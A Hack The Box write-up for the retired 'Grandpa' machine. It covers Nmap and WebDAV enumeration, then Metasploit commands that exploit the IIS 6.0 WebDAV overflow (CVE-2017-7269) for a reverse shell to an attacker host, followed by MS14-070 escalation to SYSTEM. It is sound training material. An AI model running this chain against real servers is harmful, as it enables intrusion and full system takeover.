Hack The Box Grandpa Writeup

Published:
September 10, 2024

This is a writeup for the retired Hack The Box Grandpa machine.

Solution Summary

The Grandpa machine is an old Windows system running Microsoft IIS 6.0 (the version that ships with Windows Server 2003) with WebDAV enabled. The vulnerabilities we exploit this time are:

  1. CVE-2017-7269, a buffer overflow in the ScStoragePathFromUrl function of the IIS 6.0 WebDAV component, for the initial foothold.
  2. CVE-2014-4076 (MS14-070), a kernel-mode elevation of privilege in the Windows Server 2003 TCP/IP driver, to become NT AUTHORITY\SYSTEM.

Since chaining these exploits by hand is tricky, we use Metasploit for both and gain SYSTEM privileges on the machine.

Solution

The steps to solving this machine are:

  1. Map out the machine with Nmap and find an exposed Microsoft IIS 6.0 with WebDAV.
  2. Enumerate WebDAV and check which methods are actually allowed.
  3. Exploit the WebDAV buffer overflow (CVE-2017-7269) with the Metasploit iis_webdav_scstoragepathfromurl exploit module.
  4. Post-exploitation, run the TCP/IP IOCTL privilege escalation module ms14_070_tcpip_ioctl (CVE-2014-4076) to become NT AUTHORITY\SYSTEM.
  5. Read out the flags.

Nmap

First, we identify exposed services on this machine (-A already implies -sV and -sC, so the extra flags are redundant but harmless):

nmap -sV -sC -A -oX machines/grandpa/nmap.xml 10.10.10.14

The results are:

Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-10 08:43 JST
Nmap scan report for 10.10.10.14
Host is up (0.083s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-webdav-scan:
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Date: Mon, 09 Sep 2024 23:33:42 GMT
|_  Server Type: Microsoft-IIS/6.0
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.49 seconds

Findings: only port 80/tcp is open, serving Microsoft IIS 6.0 with WebDAV enabled. The http-methods script flags a long list of risky methods, but note the difference between Public Options and Allowed Methods: PUT and MKCOL are advertised server-wide yet not allowed on /, which matters for what follows.

WebDAV

The landing page ("Under Construction") is not so interesting.

We test whether arbitrary files can be uploaded to this server:

davtest.pl -url http://10.10.10.14

As the output shows, davtest fails at every step: MKCOL is refused and every PUT is rejected regardless of extension. This matches the Nmap scan, where PUT and MKCOL appear in Public Options but not in Allowed Methods. So, unlike the Granny machine, we cannot simply upload a web shell and must find a different approach.

********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.14
********************************************************
NOTE    Random string for this session: uj5EWcwWxxc9q
********************************************************
 Creating directory
MKCOL           FAIL
********************************************************
 Sending test files
PUT     asp     FAIL
PUT     shtml   FAIL
PUT     pl      FAIL
PUT     cfm     FAIL
PUT     txt     FAIL
PUT     html    FAIL
PUT     aspx    FAIL
PUT     jhtml   FAIL
PUT     php     FAIL
PUT     cgi     FAIL
PUT     jsp     FAIL

********************************************************

Metasploit

Instead, we make use of CVE-2017-7269, a buffer overflow in the ScStoragePathFromUrl function of the IIS 6.0 WebDAV component, triggered by an overlong If header in a PROPFIND request. PROPFIND is in the Allowed Methods list, so the vulnerable code path is reachable even though uploads are not. Since the exploit is tricky to pull off by hand, we'll use Metasploit to exploit this vulnerability and get a shell.

The machine hung up at this point, and I had to reset it. After the machine reset, the following commands in msfconsole can be run to get a reverse shell:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set rhosts 10.10.10.14
set lhost 10.10.16.6
set lport 4444
run

Then inside Meterpreter, we migrate into the IIS worker process w3wp.exe. The shell already runs as NT AUTHORITY\NETWORK SERVICE, so migration gains no rights on its own, but it moves us into a long-lived process that the local exploit in the next step can work from. After migrating, we put the session in the background.

meterpreter > ps

Process List
============

 PID   PPID  Name          Arch  Session  User                          Path
 ---   ----  ----          ----  -------  ----                          ----
[...]
 1956  584   wmiprvse.exe  x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2096  392   vssvc.exe
 2160  1484  w3wp.exe      x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2228  584   davcdata.exe  x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
[...]

meterpreter > migrate 2160
[*] Migrating from 2280 to 2160...
[*] Migration completed successfully.
meterpreter > background

Privilege Escalation

Now that the Meterpreter session is in the background, we run the same TCP/IP IOCTL exploit (MS14-070, CVE-2014-4076) that we used on Granny. It is a local kernel exploit for tcpip.sys on Windows Server 2003, so it runs through the existing Meterpreter session rather than over the network; SESSION must be set to the id shown by sessions -l (here 1).

use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 1
exploit
sessions -i 1

Once the exploit has run, we interact with the session again and confirm that we are NT AUTHORITY\SYSTEM:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Retrieving the flags

We search for the flags:

meterpreter > search -d "C:/Documents and Settings" -f *.txt
Found 14 results...
===================

Path                                                      Size (bytes)  Modified (UTC)
----                                                      ------------  --------------
C:\Documents and Settings\Administrator\Desktop\root.txt  32            2017-04-12 23:29:33 +0900
[...]
C:\Documents and Settings\Harry\Desktop\user.txt          32            2017-04-12 23:32:26 +0900
[...]

We can print out the flags like so:

meterpreter > cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'
meterpreter > cat 'C:\Documents and Settings\Harry\Desktop\user.txt'

The flags are:

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.
